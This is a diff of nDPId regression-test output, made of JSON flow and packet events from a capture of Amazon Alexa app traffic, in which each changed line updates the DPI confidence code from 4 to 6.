00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1173,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_packet_id":2,"flow_last_seen":1490976083245,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976083245,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwWypAAOcGEgw27xi6rBAq2AG7hQaUlSPBbZRoTXASH\/4ogAAAAgQFtAEDAwY="} -00937{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1176,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976082723,"flow_last_seen":1490976083245,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976083245,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34053,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00937{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1176,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976082723,"flow_last_seen":1490976083245,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976083245,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34053,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1177,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_packet_id":3,"flow_last_seen":1490976083337,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976083337,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoNvVAAEAG3UmsECrYNu8YuoUGAbttlGhNlJUjwlAQAVdy8QAA"} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1195,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976085644,"flow_last_seen":1490976085644,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976085644,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45703,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1195,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1490976085644,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976085644,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8I8hAAEAGIyesECrYNF7ohrKHAbtpd3wLAAAAAKAC\/\/9ZswAAAgQFtAQCCAoA9l\/DAAAAAAEDAwg="} 
@@ -457,18 +457,18 @@ 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1201,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_packet_id":2,"flow_last_seen":1490976085970,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976085970,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwHsZAAOcGgTQ0XuiGrBAq2AG7sofzK0GgaXd8DHASH\/6hqwAAAgQFtAEDAwY="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1202,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":1490976085970,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976085970,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwdw1AAOcGKO00XuiGrBAq2AG7sojjQR2VxkD2SnASH\/7+lwAAAgQFtAEDAwY="} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1203,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_packet_id":3,"flow_last_seen":1490976085977,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976085977,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoI8lAAEAGIzqsECrYNF7ohrKHAbtpd3wM8ytBoVAQAVfsHAAA"} 
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1204,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976085644,"flow_last_seen":1490976085978,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976085978,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45703,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1204,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976085644,"flow_last_seen":1490976085978,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976085978,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45703,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1205,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_packet_id":3,"flow_last_seen":1490976085978,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976085978,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoqZ5AAEAGnWSsECrYNF7ohrKIAbvGQPZK40EdllAQAVdJCQAA"} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1206,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976085829,"flow_last_seen":1490976085978,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976085978,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45704,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1206,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976085829,"flow_last_seen":1490976085978,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976085978,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45704,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1207,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":85,"flow_packet_id":2,"flow_last_seen":1490976085978,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1490976085978,"pkt":"ePiC0\/vCAMDKkVoBCABFEAAoAABAAD0Gmy7AqAsBrBAq2B+QliIAAAAAp\/J0hVAUAAA7FAAAAAAAAAAA"} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1208,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976085644,"flow_last_seen":1490976086218,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976086218,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45703,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 
+01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1208,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976085644,"flow_last_seen":1490976086218,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976086218,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45703,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1210,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_packet_id":2,"flow_last_seen":1490976086218,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976086218,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwSbFAAOcGVkk0XuiGrBAq2AG7soktOgAj+XDMt3ASH\/7IcwAAAgQFtAEDAwY="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1211,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":84,"flow_packet_id":2,"flow_last_seen":1490976086218,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976086218,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwHTJAAOcGgsg0XuiGrBAq2AG7sosHecze3XmCE3ASH\/6IEgAAAgQFtAEDAwY="} 
-01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1212,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976085829,"flow_last_seen":1490976086218,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976086218,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45704,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1212,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976085829,"flow_last_seen":1490976086218,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976086218,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45704,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1216,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_packet_id":3,"flow_last_seen":1490976086219,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976086219,"pkt":"AMDKkaPvePiC0\/vCCABFAAAok2JAAEAGs6CsECrYNF7ohrKJAbv5cMy3LToAJFAQAVcS5QAA"} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1218,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":84,"flow_packet_id":3,"flow_last_seen":1490976086220,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976086220,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo3c9AAEAGaTOsECrYNF7ohrKLAbvdeYITB3nM31AQAVfSgwAA"} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1224,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976085832,"flow_last_seen":1490976086244,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976086244,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45705,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1230,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976085832,"flow_last_seen":1490976086648,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976086648,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45705,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1224,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976085832,"flow_last_seen":1490976086244,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976086244,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45705,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1230,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976085832,"flow_last_seen":1490976086648,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976086648,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45705,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1243,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":83,"flow_packet_id":2,"flow_last_seen":1490976086880,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976086880,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8m\/ZAAEAGPiOsECrYCsl+8Z0yH5CNbMQpAAAAAKAC\/\/93zQAAAgQFtAQCCAoA9mBAAAAAAAEDAwg="} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1266,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976088605,"flow_last_seen":1490976088605,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976088605,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45709,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1266,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1490976088605,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976088605,"pkt":"AMDKkaPvePiC0\/vCCABFAAA81ixAAEAGcMKsECrYNF7ohrKNAbu9HLbAAAAAAKAC\/\/\/KKQAAAgQFtAQCCAoA9mDsAAAAAAEDAwg="} 
@@ -477,9 +477,9 @@ 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1268,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_packet_id":2,"flow_last_seen":1490976088845,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976088845,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwfFZAAOcGI6Q0XuiGrBAq2AG7so2w2ze+vRy2wXASH\/5ffQAAAgQFtAEDAwY="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1270,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":1490976088845,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976088845,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw3pBAAOcGwWk0XuiGrBAq2AG7so5AYHD5hKZUtXASH\/4xPwAAAgQFtAEDAwY="} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1272,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_packet_id":3,"flow_last_seen":1490976088847,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976088847,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo1i1AAEAGcNWsECrYNF7ohrKNAbu9HLbBsNs3v1AQAVep7gAA"} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1273,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976088605,"flow_last_seen":1490976088849,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976088849,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45709,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1273,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976088605,"flow_last_seen":1490976088849,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976088849,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45709,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1274,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_packet_id":3,"flow_last_seen":1490976088850,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976088850,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoNFxAAEAGEqesECrYNF7ohrKOAbuEplS1QGBw+lAQAVd7sAAA"} 
-00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1276,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976088631,"flow_last_seen":1490976088854,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976088854,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45710,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 